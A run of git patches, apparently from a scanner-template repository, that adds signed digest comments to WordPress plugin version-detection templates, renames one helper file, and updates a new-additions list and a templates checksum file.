b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202bd15b219dd0e072e6da01c8c5c2ef0f2a572e9c6bfcb57bbff30603c562f118022100b0bf04d1b52c595be1389b981bdf76c3a462dd170bfdef906657efd2d3b3928f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..b860a8309a 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100efc4151f1abf84481e2455ebb3a7989df17add2073b012c75fb6abdb16b5da76022100e1e3c5f3caa8b8b6c4aab9c49af0a5c49bb4a1b23e9cd792d160dac0d54425f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..7d1f680232 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022023b309782eefcaaad86282b77fcac56f168476bdc76c4ae323c34a8a88ebf75c0220411ee9e8d8178ac85d2695e5a599692ff63fefd47d5d65fb8fa06b613747b461:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..6287624f4a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cee949298e11291f65738401f379a8906c3c922e66ccba7720a2b5a3634f44a3022100d0cc1f8193ccdb8769b6498a381912544e0825ddc8ebea8ffab6af09565e0476:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..15d5a5e57f 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022060334a978770fc99a9cd8c3e1523e2139519dc990cfac3979960fd7ae2db028c022100f3b3b060b0c19d4198f8a8726ade62d8f2ebaf89ace99d1f2543dbb563d4c2d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..f2f56e8e4e 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200ed831f3445c66d0dccd891e5b0565a0219b86fc8733c5b95c896c68434dbbaa022100b7efb681efdd5eb3aafdabc01e2b7d486d5ca840465bf2959b607c67531a8029:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..9821e0231d 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022051902d81896544aeb7f26b7044717f260ece077679b1b4239ad98209672f586202207540286f05bda52aa2569de73a95c3551c05a26207ce217b333fe457f0833427:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..ce274e341b 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022019860b9f884214a467d7cbb5c5e26bcab85eb15213063c086ab69bf5443e72370221009407d46e819f9c666ceefbf1c6afaecfee8cfd3596e4a2b13b1fc0452ddf410c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..ed17238f53 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220110b58395c8c3c9b80e23afcfc908336d2ca3871cc677282b093f23ef19ecfd402207ac71e8270c73609d749ac7069801861687b135226196e35aaf7040115ecf063:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..a29f2346f1 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b9407708e67ccc29f82ac68af90b52b4697abb577afca3278adccfc4163e19c302206d26ccbf19e7dd6eeb2d6f9da5d85feaba0aaeeb63119f05ab3d29b6e92e4b65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..9eb5fb0ba8 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100974542112d4dbdf957d1a88099b236904408f0837eb66b0f82d62e479645469902202a3c39394dff3428904343e3dd083382f3a7fcf8fcadeed73efe234270dbe2b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..3c7d3c9554 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022022f1fa7397c4f5813459d020e9ca141d5fbe4e748a44cce5f24036e67ce0fb75022079a524f8c2fd0d5d4b28fe162915eea3003e8da53de27f06962c4d12b0e0f48a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..a1b8f108b3 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f85069b6e0c1991e97205099219688d49c326820c70bb19bc6065e70c55ae7b802210090a2de523cb36514eaff710e4894ef7825d24d52f457a7f5eb2ead78c04259a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..fb95b71d60 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220554fcdf6c982d244c9bed2257bfa6459d0b5c2c9856c1bda8ff717580ae7b63b022100a991a498dfbcd08bceb930859b2100a2e004c5b43559d3ce8689b09fc1117b14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..e19607cfbf 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022069f40b46825b0ff1206ebfcfdb63040b87d15ad0c50865e3f297193b7c067e98022100a6ea115bfad4a9e3980a92d3d22313cfc38c7e8fc01627a088156d5c2366a123:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..d02471105a 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205b835aec44680daa04857550b43db0c971d59cbc7272fc765712a1ae46fd7ea902200d23cc9260da37df88d3521c6e6350c2a0e1377d640c7cc9aaf70af11839cc80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..36e3a1fef5 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cc349c4ffb9c250778927ca1b47f93b9f6fa4d8a06f3ba219f91e59d46bef98302203e41300cdd6d69f417c7d0cbf7a22cd06158f5a7ae392c95a56b7892bc5edc71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..59e4325a31 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204c167cf8113dd3c33c5d470041c404f34417a0c964ae696ded3c022745ca48b2022100cfe36cb9b3c27183e31cac75c48dbdafce57791003dd5fef3d8b20306fc924fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..5b83920f25 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d0e6f41f7147a896836d33278b181e27c8beacb6f994994ab170df9223733bd7022100fb39c3026680e015509893b6234bfcc98e4f3845024843ae6605b8c2f8b63153:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..4941e79ee0 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201b295aaf6dae66d1f3dad9f28bd3f5c974138333e61444a7f557eda5a2a8085602204e52a4f1a0b0bbce53a1edaf9453745cceb4660fd50e3e0bf7cc00a25e5f8a31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..933b881c7b 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207d82a8ce6ad41c3e3066536d29f607510826428782d4cac7de0c71064ae904db0220643dab8289a15d0d35971d19f105bb976421c1fd2541604b15f6cf02bc8577ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..1b77846b7e 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201a83d4355d9b0fb7f7eb1933663963bc752667d492574a2bed2367463116e33d022019e203f271a9b8d8960c5dd5444fd1d1037fa9addfc442728deba25c1096e451:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..b2441e6f9c 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220695062aa212fc753a4f1b04e320abf720cb1b93557b918c6b4e200a73d66c6d902207fe9a60355c3d56137098bf26d7fbc33e58ab397561a40e27cd5c47327d94d34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..f8636f78f1 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204302ec9c23acdb262e3568d116d3a235b956a636615767cdd97d149d1322fd8f022100aa12589c0872be07ecd85f48c66c35996f7bd6420901e0baf93548bbd4c233db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 58e5e828bf..a5ebec0988 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022034d8fbadad87a4205471b116f47f73e08a6eae7e9b624ca3805a20779af3c35f0220471528a4f84d5eed5ab9f2f32c96659849240d431e4e5f83b49fc85aa2d59d79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..9b59168432 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203951c4483bd3eafc7e9ecb0a25db1f8e274fb868d60fddd346667b9b405d612602201525c55c47b6f099eb1dc0e2cbaf47e3b112f1bd339fa8b67819ca01d4bbc275:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..75507a2b2d 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220199caf4bbcc2c258f8cdcf5315151d8e8b6a9af9283913890439afb906fedd4d022100db95422d835c5725d3a97ba152f3bb69add1d9de54113f63875b57c43c7b0472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..52889669ee 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100de5d7e1a14b35a8ea4e69af06fdbbdc6f07cf27417618341108434d5c393d31502207b4fc0a6676320d989c30037857e95e9a7655411e2f9eb3be348edc304d24cf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d03af035b0313523e0da29b4268b8252349f5c56 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 1 Jul 2024 11:14:07 +0530 Subject: [PATCH 0741/1841] Rename chaty.yaml to chaty.txt --- helpers/wordpress/plugins/{chaty.yaml => chaty.txt} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename helpers/wordpress/plugins/{chaty.yaml => chaty.txt} (100%) diff --git a/helpers/wordpress/plugins/chaty.yaml b/helpers/wordpress/plugins/chaty.txt similarity index 100% rename from helpers/wordpress/plugins/chaty.yaml rename to helpers/wordpress/plugins/chaty.txt From ef4a0d4f9e267514675786cd8a1cbae22b6309b9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 1 Jul 2024 05:44:32 +0000 Subject: [PATCH 0742/1841] Auto Generated New Template Addition List [Mon Jul 1 05:44:32 UTC 2024] :robot: --- .new-additions | 1 - 1 file changed, 1 deletion(-) diff --git a/.new-additions b/.new-additions index a8f4d10b84..806809f139 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,3 @@ -helpers/wordpress/plugins/chaty.yaml http/cves/2023/CVE-2023-41599.yaml http/cves/2023/CVE-2023-52251.yaml http/cves/2024/CVE-2024-34102.yaml From 9e6707ef43e1c4701d4a508e1ca6186f59e5a6fb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Jul 2024 05:44:37 +0000 Subject: [PATCH 0743/1841] Auto Generated Templates Checksum [Mon Jul 1 05:44:37 UTC 2024] :robot: --- templates-checksum.txt | 414 ++++++++++++++++++++--------------------- 1 file changed, 207 insertions(+), 207 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 94432558f1..7445fbdd29 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -751,7 +751,7 @@ helpers/wordpress/plugins/black-studio-tinymce-widget.txt:b74c052eec677c340bd7f9 helpers/wordpress/plugins/breadcrumb-navxt.txt:2993934f31a10ddda5a7fb5e979600aa8bc7d69d helpers/wordpress/plugins/breeze.txt:12c708130d75c9e7150d0af82c0b82b66c6c85e0 helpers/wordpress/plugins/broken-link-checker.txt:47ac56ccfa5b6db61c32cb48c2dda8cc64d242cb -helpers/wordpress/plugins/chaty.yaml:22603432911b0496f708ee79d4b1177c5263be32 +helpers/wordpress/plugins/chaty.txt:22603432911b0496f708ee79d4b1177c5263be32 helpers/wordpress/plugins/child-theme-configurator.txt:fbd969c78e9a6d04b7b8fc3a74ee2ee96b5fb3d8 helpers/wordpress/plugins/classic-editor.txt:933c3d96b7fbc319e2e08dda5c340797d7c8d99f helpers/wordpress/plugins/classic-widgets.txt:98250286db92ccc336dc6f622c10c8bc09286693 @@ -3503,7 +3503,7 @@ http/default-logins/bloofoxcms-default-login.yaml:521262f1b70cf41dabf50e7022c8d6 http/default-logins/caimore/caimore-default-login.yaml:fa6dc9fbfefd35cbe6b0122cbe2063f51286d122 http/default-logins/cambium-networks/cambium-networks-default-login.yaml:928052d49de95f8d8b897803364418aca8270c23 http/default-logins/camunda/camunda-default-login.yaml:e0ba275d0aeadc4a4e0df5010277d2db9e6329e7 -http/default-logins/caprover/caprover-default-login.yaml:3d03d884e8588228a1fb02dc81ec83b17f28aee7 +http/default-logins/caprover/caprover-default-login.yaml:b14740f04e3942e27b8f6005422796e22cc3a55d http/default-logins/chinaunicom/chinaunicom-default-login.yaml:825cceb7abec9ba21938e316e8748da23c72c82a http/default-logins/cobbler/cobbler-default-login.yaml:2994d59f748f3b084644bb25989f6ecc8ea81a2a http/default-logins/cobbler/hue-default-credential.yaml:810629da57236ea925fc51305d98564392a5b017 @@ -3558,7 +3558,7 @@ http/default-logins/iptime/iptime-default-login.yaml:48f3d34ec32b4e732a8ba25d4a8 http/default-logins/ispconfig-default-login.yaml:2126a9ba475f54484184cd47bc03e677eecfa543 http/default-logins/jboss/jboss-jbpm-default-login.yaml:fd2387ad05ebe5855e3dfb79602c5226b585c458 http/default-logins/jboss/jmx-default-login.yaml:7225145aa06029dd8dc5652950f7fdbae7d4b39a -http/default-logins/jeedom/jeedom-default-login.yaml:7c17fa59a0da80abc35acc3d7d79c4708028d958 +http/default-logins/jeedom/jeedom-default-login.yaml:91978558f333b356a32c73d6119775d4ac56300d http/default-logins/jenkins/jenkins-default.yaml:bf1375ede015990a06127d5242c7c7c02a529da7 http/default-logins/jinher/jinher-oa-default-login.yaml:73afa499ea62035643ff5c59540428230c5ee4f7 http/default-logins/jupyterhub/jupyterhub-default-login.yaml:c0c1b860e3aed49ba84b96b2ad652b954773c684 @@ -4843,7 +4843,7 @@ http/exposures/configs/exposed-hg.yaml:a88625c10530e2d9a7717cd4a2d4b0f7f35ab167 http/exposures/configs/exposed-sharepoint-list.yaml:912d3a0311062208cd6cc6d92a9b6456c2f653d2 http/exposures/configs/exposed-svn.yaml:9fb8eb671ef20a0114ce31a5db568992528d85ae http/exposures/configs/exposed-vscode.yaml:dbcb3ed67d0dff4e71076924fb318d2a5a7614f9 -http/exposures/configs/filestash-admin-config.yaml:ba80e0499499c4f049c4d55b4359b5178d38250a +http/exposures/configs/filestash-admin-config.yaml:3f7ba25430b6b46c4f18c279aafd08b5025208fa http/exposures/configs/firebase-config-exposure.yaml:3fb8f306a1cc3f5741eb0ba1275d557471ce16ae http/exposures/configs/ftp-credentials-exposure.yaml:378fc0c5562138a94812d60c0f3d45cd054704da http/exposures/configs/gcloud-config-default.yaml:91ae35f1db1a63605f03aebdda8ed421a6c3d557 @@ -5522,7 +5522,7 @@ http/misconfiguration/express-stack-trace.yaml:5d6a09415331603b6718bb7b766f90606 http/misconfiguration/feiyuxing-info-leak.yaml:8283a5c83d32a5290bfb243fa629e47e8aecdadf http/misconfiguration/filebrowser-unauth.yaml:a888d5a22057e6a9bad36d051b74f2092ccc61ff http/misconfiguration/flask-redis-docker.yaml:884961c3e4b03b5cff631eae034ce3add285e676 -http/misconfiguration/forgejo-repo-exposure.yaml:84e1491ac158e36e3adac354949de9b579545d21 +http/misconfiguration/forgejo-repo-exposure.yaml:414624d596a24b8e02be991c5a00bd859697624f http/misconfiguration/formalms-install.yaml:c81cf4919398991aef477d82b3ff17742f7d2280 http/misconfiguration/front-page-misconfig.yaml:43a1c8208f0ac3863a17fa06b8fe9c014fbf8a6a http/misconfiguration/fusionauth-admin-setup.yaml:a0bcf30e5ef642af46bb01a7135a26c24d894dfc @@ -5676,10 +5676,10 @@ http/misconfiguration/installer/phpgedview-installer.yaml:c3abf51106828355409764 http/misconfiguration/installer/phpipam-installer.yaml:fd13b9a8528ac804f19dea5ffb775e82aa01b87d http/misconfiguration/installer/phpmyfaq-installer.yaml:d21e8a4ea781328f94303a5d1ac610abb96a19a6 http/misconfiguration/installer/phpwind-installer.yaml:382bd97db9268ea3922f6ea937ef2d07a77c0cf0 -http/misconfiguration/installer/piwigo-installer.yaml:545259e01f02d7c7a705e1fc31771e50f75e991c +http/misconfiguration/installer/piwigo-installer.yaml:8c8cffddb176c1233eac80628ba8a3c5967ee73a http/misconfiguration/installer/piwik-installer.yaml:13b6e4cc5e4a106ac91c0f984089a3465a67af49 http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40b3f1c065e91 -http/misconfiguration/installer/poste-io-installer.yaml:361b3e51cc8bdad9878c5839f3ecd23ef919fd1f +http/misconfiguration/installer/poste-io-installer.yaml:6c3bbd9a9921a652911b49917071d448b427e2ad http/misconfiguration/installer/posteio-installer.yaml:d4662ebf401e1c2128570f674b63ccf25970599b http/misconfiguration/installer/prestashop-installer.yaml:5011384078f8708b8ec90caa52c299ecb922dea5 http/misconfiguration/installer/processwire-installer.yaml:77810f7d222228fb1c1afb38560135f4b7718d24 @@ -7228,228 +7228,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:ec57f3b465eaf57bf1b8f8f35fe882772f3915c6 +http/technologies/wordpress/plugins/add-to-any.yaml:329bec71d9dcebe0121501e719996fa143b23af8 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8167f5def9edba31b701df1c8d337f98f99091 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:4a54b8480fb24b13e3489c8d94a5d510a200e290 +http/technologies/wordpress/plugins/akismet.yaml:4f5ef22d9ff0fb0e0447a26d52892d2c0247f780 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:206d6a3f7cc7e29ff664dec6938950941d260c83 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:282c0e5d1264858850e9544a769e53b49b75a93b +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:9bf2340920d4f739367f72ef92deb55a0ea1fca0 +http/technologies/wordpress/plugins/amp.yaml:08164d4e6bc119955f893a06957ccbfbf87ffd96 +http/technologies/wordpress/plugins/antispam-bee.yaml:8869676746533a0b26d4a8ebe90232db970ec8a8 +http/technologies/wordpress/plugins/astra-sites.yaml:215f3a8246769e2c0eacdfc3456d65c07e2dbf7e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:4a4148493de40c756d2829cbfbd4bed442a270bf +http/technologies/wordpress/plugins/autoptimize.yaml:c12e4bdcd707a36a36f8ec746640368a9ab9b8a6 +http/technologies/wordpress/plugins/backwpup.yaml:d3078e65347c8e7ba29c07a31d19e59d919b17e2 +http/technologies/wordpress/plugins/better-search-replace.yaml:fcb1bd8c34d888cbdd8c91b9bd376f7f2c5e1db4 +http/technologies/wordpress/plugins/better-wp-security.yaml:d70b7fd8629f55e96e81e383a1c03fdbe4d6053f 